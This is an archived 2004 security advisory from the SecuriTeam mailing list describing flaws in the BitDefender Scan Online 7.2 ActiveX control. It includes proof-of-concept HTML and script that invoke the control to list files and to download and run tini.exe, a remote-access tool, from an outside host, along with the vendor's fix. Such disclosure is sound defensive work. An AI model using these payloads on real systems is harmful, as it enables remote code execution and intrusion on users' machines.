[NT] Multiple Vulnerabilities in BitDefender Scan Online (ActiveX)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/21/04
- Previous message: SecuriTeam: "[NT] NetFile FTP Denial of Service (Nonexisting Username)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Apr 2004 19:53:19 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in BitDefender Scan Online (ActiveX)
------------------------------------------------------------------------
SUMMARY
" <http://www.bitdefender.com/scan/Msie/index.php> BitDefender Scan Online
is a fully functional AntiVirus product, with a web-based interface and
featuring all required elements for remotely AntiVirus scanning and
cleaning: it scans system's memory, all files, folders and drives' boot
sector, providing the user with the option to automatically clean the
infected files."
Due to unsafe behavior of some of BitDefender's objects, malicious HTML
can disclose sensitive information, downloads and executes any file we
desire.
DETAILS
Vulnerable Systems:
* BitDefender Scan Online 7.2
BitDefender installs and registers the following COM/ActiveX objects:
"AVXSCANONLINE.AvxScanOnlineCtrl.1"
With the following CLSID: 80DD2229-B8E4-4C77-B72F-F22972D723EA
Properties of the objects are not accessible by using the following
script:
object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")
However, using the following script the object's properties and methods
can be accessed:
<0BJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
BitDefender allows disclosure of all file system objects (files and
directories) using the following HTML:
------------------- CUT HERE -------------------
<0BJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></0BJECT>
------------------- CUT HERE -------------------
Another BitDefender function allows a remote attacker to cause the program
to download and execute a file on the system:
object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
The following proof of concept code will download a file from the Internet
and execute it on the machine:
------------------- CUT HERE -------------------
<0BJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<scr!pt>
var a;
function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}
setTimeout("cool()", 1500);
</scr!pt>
------------------- CUT HERE -------------------
Solution:
The vendor has issued a new version of this ActiveX that doesn't contain
the above vulnerabilities. To upgrade to the new version, access the
company's web site and request an online scan.
ADDITIONAL INFORMATION
The information has been provided by <mailto:theinsider@012.net.il> Rafel
Ivgi, The-Insider and <mailto:spotirca@bitdefender.com> Sami POTIRCA.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] NetFile FTP Denial of Service (Nonexisting Username)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
